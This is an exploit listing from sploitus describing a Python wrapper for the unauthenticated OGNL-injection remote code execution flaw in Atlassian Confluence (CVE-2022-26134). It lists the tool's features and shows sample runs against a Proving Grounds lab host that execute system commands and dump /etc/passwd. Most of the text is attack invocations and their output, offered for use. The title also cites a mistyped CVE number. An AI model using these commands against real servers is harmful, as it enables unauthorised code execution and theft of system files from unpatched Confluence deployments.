Exploit for Expression Language Injection in Atlassian Confluence_Data_Center CVE-2022-26134 CVE-2022-26314

## https://sploitus.com/exploit?id=597C8195-D623-5002-A378-66A54CD71A18
# CVE-2022-26134 - Atlassian Confluence OGNL RCE

This script is a wrapper over an unauthenticated remote code execution via OGNL injection exploit primitive in Confluence Data Center and Server ([CVE-2022-26314](https://nvd.nist.gov/vuln/detail/cve-2022-26134)).
- [Vendor advisory](https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html)

It was originally inspired by the PoC [`through_the_wire.py`](https://github.com/jbaines-r7/through_the_wire), with some "improvements" I've added:
- actual RCE via base64-encoding the command
- read from scripts with `-c @/path/to/file`; shebang-aware (see [example usage](#example-usage))
- no `netcat` dependency; Python-native sockets for command and file read output
- preliminary vulnerability check
- Metasploit-style iface -> addr LHOST resolution

## example usage

Some examples from the Proving Grounds box [Flu](https://portal.offsec.com/machine/flu-150748/overview):
```sh-session
kali@kali:~/ctf/offsec/pg/flu$ cat test.py               
#!/usr/bin/env python3
import sys;print(sys.version)
                                                                                                                                                                                                                  
kali@kali:~/ctf/offsec/pg/flu$ ./cve-2022-26134.py -c '@test.py' http://192.168.159.41:8090 tun0 2>/dev/null
3.11.4 (main, Dec  7 2023, 15:43:41) [GCC 12.3.0]
                                                                                                                                                                                                                  
kali@kali:~/ctf/offsec/pg/flu$ ./cve-2022-26134.py -c 'id;hostname;ip a' http://192.168.159.41:8090 tun0            
[*] target is vulnerable
uid=1001(confluence) gid=1001(confluence) groups=1001(confluence)
flu
1: lo:  mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
3: ens160:  mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:86:cc:58 brd ff:ff:ff:ff:ff:ff
    altname enp3s0
    inet 192.168.159.41/24 brd 192.168.159.255 scope global ens160
       valid_lft forever preferred_lft forever
                                                                                                                                                                                                                  
kali@kali:~/ctf/offsec/pg/flu$ ./cve-2022-26134.py --readfile '/etc/passwd' http://192.168.159.41:8090 tun0 2>/dev/null | head
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
```